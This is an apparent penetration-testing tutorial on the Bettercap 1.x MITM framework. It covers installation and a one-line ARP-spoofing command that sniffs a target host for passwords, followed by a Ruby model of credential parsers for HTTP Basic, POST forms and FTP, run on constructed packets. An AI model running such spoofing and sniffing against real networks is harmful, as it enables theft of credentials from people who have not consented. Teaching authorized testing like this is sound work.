Bettercap : MITM Framework for Penetration Testers
Man-in-the-Middle (MITM) attacks are common during penetration tests and open the way to a range of other network-based attacks, such as password sniffing and SSL stripping. Bettercap is a framework built for exactly this kind of testing. It installs easily on Ubuntu or Kali (or whatever Linux distribution you use for penetration testing) and ships with a large set of extensible features. This tutorial covers what Bettercap can do and how to use it effectively.
What is Bettercap?
BetterCAP is a powerful, open-source MITM framework for carrying out various kinds of Man-in-the-Middle attacks against a network, manipulating HTTP and HTTPS traffic in real time, and more. It has a large set of extensible features; the most important ones are listed here:
Full and half duplex ARP spoofing.
The first real ICMP DoubleDirect spoofing implementation.
Configurable DNS spoofing.
Real-time and fully automated host discovery.
Real-time credential harvesting for protocols such as HTTP(S) POSTed data, Basic and Digest authentication, FTP, IRC, POP, IMAP, SMTP, NTLM (HTTP, SMB, LDAP, etc.) and more.
Fully customizable network sniffer.
Modular HTTP and HTTPS transparent proxies with support for user plugins, plus built-in plugins to inject custom HTML code, JS or CSS files and URLs.
SSL stripping.
Built-in HTTP server.
Why don't I simply use ettercap instead?
Ettercap filters do not work most of the time, are outdated and are hard to write because of the specific language they are implemented in.
Ettercap is very unstable on big networks: try launching host discovery on anything larger than the usual /24.
Unless you are a C/C++ developer, you cannot easily extend ettercap or write your own module.
Ettercap's ICMP spoofing is completely useless.
Ettercap does not provide a built-in, modular HTTP(S) transparent proxy.
Ettercap does not provide a smart and fully customizable credential sniffer.
Here is the official Bettercap documentation: https://bettercap.org/docs/intro/
Installation
Before installing the bettercap package itself, install its build dependencies with apt-get. The following packages are required to build and run bettercap:
build-essential
ruby-dev
libpcap-dev
Code:
sudo apt-get install build-essential ruby-dev libpcap-dev
Once the dependencies have finished installing, install bettercap with the Ruby package manager:
Code:
sudo gem install bettercap
That is all you need to get started with the Bettercap MITM framework. Note that the gem is the legacy Ruby release (bettercap 1.x); the current bettercap 2.x is written in Go, ships as a single binary and uses a different command-line syntax, so the options below apply to the 1.x gem.
A simple credential-stealing attack can be run with the following command:
sudo bettercap -X --custom-parser "password" -T 192.168.100.101
The -X option enables the sniffer, and --custom-parser passes a regular expression that is matched against the payload of every captured packet; any packet containing a match is reported. This is what makes Bettercap's sniffer so useful. -T sets the target host (here 192.168.100.101), which is ARP spoofed so that its traffic flows through the attacker's machine. The sniffer only sees cleartext, so credentials sent over HTTPS are captured only if the connection is first downgraded or proxied with Bettercap's SSL stripping and HTTPS proxy features.
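To show what the sniffer is doing behind that one command, here is an added example in Ruby (the language bettercap 1.x is written in); it is not bettercap's own code. It models a sniffer in the style of -X: a few built-in credential parsers of the kind the feature list mentions (HTTP Basic, POSTed form data, FTP USER/PASS) run over reassembled TCP payloads, a CUSTOM parser that reports any payload matching a user-supplied regular expression the way --custom-parser does, and a target filter like -T. It goes a little beyond the page's single regex by including the protocol parsers. The packet contents, hosts and class names are constructed for this example.

```ruby
# Added example (not bettercap's own code). A stripped-down model of a sniffer
# like the one -X enables: a few built-in credential parsers run over reassembled
# TCP payloads, a CUSTOM parser that reports any payload matching a user-supplied
# regular expression (the idea behind --custom-parser), and a target filter like -T.
# Packet contents, hosts and class names are constructed for this example.

require 'uri'

Packet = Struct.new(:src, :dst, :payload)

# HTTP Basic: "Authorization: Basic base64(user:pass)" travels in every request.
class BasicAuthParser
  NAME = 'HTTPAUTH'
  def parse(pkt)
    m = pkt.payload.match(%r{^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)}i)
    return nil unless m
    user, pass = m[1].unpack1('m').split(':', 2)   # 'm' = base64 decode
    { parser: NAME, user: user, pass: pass }
  end
end

# Form logins: a POST with an urlencoded body that carries a password-like field.
class PostParser
  NAME = 'POST'
  USER_KEYS = /\A(user|username|login|email)\z/i
  PASS_KEYS = /\A(pass|password|passwd|pwd)\z/i
  def parse(pkt)
    return nil unless pkt.payload.start_with?('POST ')
    head, body = pkt.payload.split("\r\n\r\n", 2)
    return nil unless body && head =~ %r{Content-Type:\s*application/x-www-form-urlencoded}i
    fields = URI.decode_www_form(body).to_h
    pass = fields.find { |k, _| k =~ PASS_KEYS }&.last
    return nil unless pass
    { parser: NAME, user: fields.find { |k, _| k =~ USER_KEYS }&.last, pass: pass }
  end
end

# FTP: USER and PASS arrive in separate packets, so the parser keeps state per flow.
class FtpParser
  NAME = 'FTP'
  def initialize
    @pending = {}   # [src, dst] => username seen in USER
  end
  def parse(pkt)
    flow = [pkt.src, pkt.dst]
    if pkt.payload =~ /\AUSER (\S+)/
      @pending[flow] = Regexp.last_match(1)
      nil
    elsif pkt.payload =~ /\APASS (\S+)/
      user = @pending.delete(flow)
      user ? { parser: NAME, user: user, pass: Regexp.last_match(1) } : nil
    end
  end
end

# Equivalent of --custom-parser: report the line of any payload that matches.
class CustomParser
  NAME = 'CUSTOM'
  def initialize(expression)
    @re = Regexp.new(expression, Regexp::IGNORECASE)
  end
  def parse(pkt)
    line = pkt.payload.lines.find { |l| l =~ @re }
    line ? { parser: NAME, match: line.strip } : nil
  end
end

class Sniffer
  def initialize(parsers, target: nil)
    @parsers, @target = parsers, target
  end
  # Feed packets through every parser; drop packets not involving the target (-T).
  def run(packets)
    packets.each_with_object([]) do |pkt, out|
      next if @target && pkt.src != @target && pkt.dst != @target
      @parsers.each do |p|
        hit = p.parse(pkt)
        out << hit.merge(src: pkt.src, dst: pkt.dst) if hit
      end
    end
  end
end

def run_sniffer(packets, custom: nil, target: nil)
  parsers = [BasicAuthParser.new, PostParser.new, FtpParser.new]
  parsers << CustomParser.new(custom) if custom
  Sniffer.new(parsers, target: target).run(packets)
end

# Constructed traffic: the target host logs in over HTTP, HTTP Basic and FTP, and a
# second host sends Basic auth too (reported only when no -T target is set).
VICTIM = '192.168.100.101'
SAMPLES = [
  Packet.new(VICTIM, '93.184.216.34',
             "POST /login HTTP/1.1\r\nHost: example.com\r\n" \
             "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n" \
             "username=alice&password=hunter2"),
  Packet.new(VICTIM, '93.184.216.34',
             "GET /admin HTTP/1.1\r\nHost: example.com\r\nAuthorization: Basic Ym9iOnMzY3JldA==\r\n\r\n"),
  Packet.new(VICTIM, '192.168.100.5', "USER ftpuser\r\n"),
  Packet.new(VICTIM, '192.168.100.5', "PASS Winter2016!\r\n"),
  Packet.new('192.168.100.55', '93.184.216.34',
             "GET / HTTP/1.1\r\nAuthorization: Basic Ym9iOnMzY3JldA==\r\n\r\n")
]

if __FILE__ == $PROGRAM_NAME
  run_sniffer(SAMPLES, custom: 'password', target: VICTIM).each { |hit| p hit }
end
```

Two things the model makes visible: the custom regex is matched against raw payload text, so "password" fires on the form field name regardless of which protocol carried it, and protocol-aware parsers such as the FTP one need per-flow state because the username and password arrive in different packets. Everything here assumes cleartext; a TLS session would hand the parsers only ciphertext.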
Purely for educational purposes. Penetration testing without authorization is illegal.